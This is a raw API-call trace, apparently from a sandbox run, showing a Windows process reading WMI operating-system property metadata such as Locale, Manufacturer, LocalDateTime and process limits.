[0050.705] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.705] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.705] SysStringLen (param_1="CodeSet") returned 0x7 [0050.705] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.705] SysStringLen (param_1="Description") returned 0xb [0050.705] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.705] SysStringLen (param_1="EncryptionLevel") returned 0xf [0050.705] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.706] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.706] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.706] SysStringLen (param_1="FreeVirtualMemory") returned 0x11 [0050.706] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.706] SysStringLen (param_1="InstallDate") returned 0xb [0050.706] SysStringLen (param_1="InstallDate") returned 0xb [0050.706] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.706] IUnknown:Release (This=0x233e12d5c10) returned 0x1 [0050.706] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.706] IWbemClassObject:Get (in: This=0x233e12d5960, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127f1c8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LocalDateTime", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.706] IWbemClassObject:Get (in: This=0x233e12d5960, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b808, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LocalDateTime", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.706] GetCurrentThreadId () returned 0xdf0 [0050.706] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.706] IWbemClassObject:Get (in: This=0x233e12d5960, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Operating system's notion of the local date and time of day.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.707] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.707] lstrlenA (lpString="") returned 0 [0050.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0c0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.707] SysStringLen (param_1="Operating system's notion of the local date and time of day.") returned 0x3c [0050.707] SysStringLen (param_1="") returned 0x0 [0050.707] GetCurrentThreadId () returned 0xdf0 [0050.707] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.707] IWbemClassObject:Get (in: This=0x233e12d5960, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.707] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.708] SysStringLen (param_1="LocalDateTime") returned 0xd [0050.708] SysStringLen (param_1="CodeSet") returned 0x7 [0050.708] SysStringLen (param_1="LocalDateTime") returned 0xd [0050.708] SysStringLen (param_1="Description") returned 0xb [0050.708] SysStringLen (param_1="LocalDateTime") returned 0xd [0050.708] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.708] SysStringLen (param_1="LocalDateTime") returned 0xd [0050.708] SysStringLen (param_1="FreeVirtualMemory") returned 0x11 [0050.708] SysStringLen (param_1="LocalDateTime") returned 0xd [0050.708] SysStringLen (param_1="InstallDate") returned 0xb [0050.708] SysStringLen (param_1="LocalDateTime") returned 0xd [0050.708] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.708] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.708] SysStringLen (param_1="LocalDateTime") returned 0xd [0050.708] IUnknown:Release (This=0x233e12d5960) returned 0x1 [0050.708] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.708] IWbemClassObject:Get (in: This=0x233e12d8af0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b808, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Locale", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.708] IWbemClassObject:Get (in: This=0x233e12d8af0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bec8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Locale", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.708] GetCurrentThreadId () returned 0xdf0 [0050.708] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.709] IWbemClassObject:Get (in: This=0x233e12d8af0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Locale property indicates the language identifier used by the operating system. A language identifier is a standard international numeric abbreviation for a country or region. Each language has a unique language identifier (LANGID), a 16-bit value that consists of a primary language identifier and a secondary language identifier.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.709] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.709] lstrlenA (lpString="") returned 0 [0050.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1a0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.709] SysStringLen (param_1="The Locale property indicates the language identifier used by the operating system. A language identifier is a standard international numeric abbreviation for a country or region. Each language has a unique language identifier (LANGID), a 16-bit value that consists of a primary language identifier and a secondary language identifier.") returned 0x14f [0050.709] SysStringLen (param_1="") returned 0x0 [0050.709] GetCurrentThreadId () returned 0xdf0 [0050.709] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.709] IWbemClassObject:Get (in: This=0x233e12d8af0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.709] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.709] SysStringLen (param_1="Locale") returned 0x6 [0050.709] SysStringLen (param_1="CodeSet") returned 0x7 [0050.709] SysStringLen (param_1="Locale") returned 0x6 [0050.709] SysStringLen (param_1="Description") returned 0xb [0050.710] SysStringLen (param_1="Locale") returned 0x6 [0050.710] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.710] SysStringLen (param_1="Locale") returned 0x6 [0050.710] SysStringLen (param_1="FreeVirtualMemory") returned 0x11 [0050.710] SysStringLen (param_1="Locale") returned 0x6 [0050.710] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.710] SysStringLen (param_1="Locale") returned 0x6 [0050.710] SysStringLen (param_1="LocalDateTime") returned 0xd [0050.710] SysStringLen (param_1="LocalDateTime") returned 0xd [0050.710] SysStringLen (param_1="Locale") returned 0x6 [0050.710] IUnknown:Release (This=0x233e12d8af0) returned 0x1 [0050.710] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.710] IWbemClassObject:Get (in: This=0x233e12d8da0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea988, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Manufacturer", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.710] IWbemClassObject:Get (in: This=0x233e12d8da0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea658, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Manufacturer", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.710] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.710] IWbemClassObject:Get (in: This=0x233e12d8da0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Manufacturer property indicates the name of the operating system manufacturer. For Win32 systems this value will be Microsoft Corporation.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.711] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.711] lstrlenA (lpString="") returned 0 [0050.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1b0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.711] SysStringLen (param_1="The Manufacturer property indicates the name of the operating system manufacturer. For Win32 systems this value will be Microsoft Corporation.") returned 0x8f [0050.711] SysStringLen (param_1="") returned 0x0 [0050.711] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.711] IWbemClassObject:Get (in: This=0x233e12d8da0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.711] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.712] SysStringLen (param_1="Manufacturer") returned 0xc [0050.712] SysStringLen (param_1="Description") returned 0xb [0050.712] SysStringLen (param_1="Manufacturer") returned 0xc [0050.712] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.712] SysStringLen (param_1="Manufacturer") returned 0xc [0050.712] SysStringLen (param_1="FreeVirtualMemory") returned 0x11 [0050.712] SysStringLen (param_1="Manufacturer") returned 0xc [0050.712] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.712] SysStringLen (param_1="Manufacturer") returned 0xc [0050.712] SysStringLen (param_1="LocalDateTime") returned 0xd [0050.712] SysStringLen (param_1="Manufacturer") returned 0xc [0050.712] SysStringLen (param_1="Locale") returned 0x6 [0050.712] SysStringLen (param_1="Locale") returned 0x6 [0050.712] SysStringLen (param_1="Manufacturer") returned 0xc [0050.712] IUnknown:Release (This=0x233e12d8da0) returned 0x1 [0050.712] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.712] IWbemClassObject:Get (in: This=0x233e12d9860, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bec8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxNumberOfProcesses", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.712] IWbemClassObject:Get (in: This=0x233e12d9860, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b848, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxNumberOfProcesses", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.713] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.713] IWbemClassObject:Get (in: This=0x233e12d9860, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Maximum number of process contexts the operating system can support. If there is no fixed maximum, the value should be 0. On systems that have a fixed maximum, this object can help diagnose failures that occur when the maximum is reached. If unknown, enter -1.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.713] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.713] lstrlenA (lpString="") returned 0 [0050.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.713] SysStringLen (param_1="Maximum number of process contexts the operating system can support. If there is no fixed maximum, the value should be 0. On systems that have a fixed maximum, this object can help diagnose failures that occur when the maximum is reached. If unknown, enter -1.") returned 0x104 [0050.713] SysStringLen (param_1="") returned 0x0 [0050.713] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.714] IWbemClassObject:Get (in: This=0x233e12d9860, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.714] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.714] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.714] SysStringLen (param_1="Description") returned 0xb [0050.714] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.714] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.714] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.714] SysStringLen (param_1="FreeVirtualMemory") returned 0x11 [0050.714] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.714] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.714] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.714] SysStringLen (param_1="Locale") returned 0x6 [0050.714] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.714] SysStringLen (param_1="Manufacturer") returned 0xc [0050.714] SysStringLen (param_1="Manufacturer") returned 0xc [0050.714] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.714] IUnknown:Release (This=0x233e12d9860) returned 0x1 [0050.714] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.715] IWbemClassObject:Get (in: This=0x233e12dade0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1231d98, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxProcessMemorySize", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.715] IWbemClassObject:Get (in: This=0x233e12dade0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ebfe8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxProcessMemorySize", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.715] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.715] IWbemClassObject:Get (in: This=0x233e12dade0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Maximum number of kilobytes of memory that can be allocated to a process. For operating systems with no virtual memory, this value is typically equal to the total amount of physical memory minus memory used by the BIOS and OS. For some operating systems, this value may be infinity - in which case, 0 should be entered. In other cases, this value could be a constant - for example, 2G or 4G.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.715] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.715] lstrlenA (lpString="") returned 0 [0050.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc240, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.715] SysStringLen (param_1="Maximum number of kilobytes of memory that can be allocated to a process. For operating systems with no virtual memory, this value is typically equal to the total amount of physical memory minus memory used by the BIOS and OS. For some operating systems, this value may be infinity - in which case, 0 should be entered. In other cases, this value could be a constant - for example, 2G or 4G.") returned 0x187 [0050.715] SysStringLen (param_1="") returned 0x0 [0050.716] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.716] IWbemClassObject:Get (in: This=0x233e12dade0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.716] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.716] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14 [0050.716] SysStringLen (param_1="Description") returned 0xb [0050.716] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14 [0050.716] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.716] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14 [0050.716] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.716] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14 [0050.716] SysStringLen (param_1="Locale") returned 0x6 [0050.716] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14 [0050.716] SysStringLen (param_1="Manufacturer") returned 0xc [0050.716] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14 [0050.716] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.716] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.716] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14 [0050.716] IUnknown:Release (This=0x233e12dade0) returned 0x1 [0050.716] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.717] IWbemClassObject:Get (in: This=0x233e12db340, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ebfe8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.717] IWbemClassObject:Get (in: This=0x233e12db340, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ec3f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.717] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.717] IWbemClassObject:Get (in: This=0x233e12db340, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The inherited Name property serves as key of an operating system instance within a computer system.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.717] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.717] lstrlenA (lpString="") returned 0 [0050.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0d0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.717] SysStringLen (param_1="The inherited Name property serves as key of an operating system instance within a computer system.") returned 0x63 [0050.717] SysStringLen (param_1="") returned 0x0 [0050.718] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.718] IWbemClassObject:Get (in: This=0x233e12db340, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.718] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.718] SysStringLen (param_1="Name") returned 0x4 [0050.719] SysStringLen (param_1="Description") returned 0xb [0050.719] SysStringLen (param_1="Name") returned 0x4 [0050.719] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.719] SysStringLen (param_1="Name") returned 0x4 [0050.719] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.719] SysStringLen (param_1="Name") returned 0x4 [0050.719] SysStringLen (param_1="Locale") returned 0x6 [0050.719] SysStringLen (param_1="Name") returned 0x4 [0050.719] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.719] SysStringLen (param_1="Name") returned 0x4 [0050.719] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14 [0050.719] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14 [0050.719] SysStringLen (param_1="Name") returned 0x4 [0050.719] IUnknown:Release (This=0x233e12db340) returned 0x1 [0050.719] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.719] IWbemClassObject:Get (in: This=0x233e12d9b10, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eaa48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfLicensedUsers", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.719] IWbemClassObject:Get (in: This=0x233e12d9b10, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea508, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfLicensedUsers", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.719] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.719] IWbemClassObject:Get (in: This=0x233e12d9b10, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Number of user licenses for the operating system. If unlimited, enter 0. If unknown, enter -1.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.720] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.720] lstrlenA (lpString="") returned 0 [0050.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1b0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.720] SysStringLen (param_1="Number of user licenses for the operating system. If unlimited, enter 0. If unknown, enter -1.") returned 0x5e [0050.720] SysStringLen (param_1="") returned 0x0 [0050.720] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.720] IWbemClassObject:Get (in: This=0x233e12d9b10, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.720] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.721] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15 [0050.721] SysStringLen (param_1="Description") returned 0xb [0050.721] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15 [0050.721] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.721] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15 [0050.721] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.721] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15 [0050.721] SysStringLen (param_1="Locale") returned 0x6 [0050.721] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15 [0050.721] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.721] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15 [0050.721] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14 [0050.721] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15 [0050.721] SysStringLen (param_1="Name") returned 0x4 [0050.721] SysStringLen (param_1="Name") returned 0x4 [0050.721] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15 [0050.721] IUnknown:Release (This=0x233e12d9b10) returned 0x1 [0050.721] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.721] IWbemClassObject:Get (in: This=0x233e12dbe00, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ec3f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfProcesses", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.721] IWbemClassObject:Get (in: This=0x233e12dbe00, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ec128, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfProcesses", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.721] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.722] IWbemClassObject:Get (in: This=0x233e12dbe00, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Number of process contexts currently loaded or running on the operating system.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 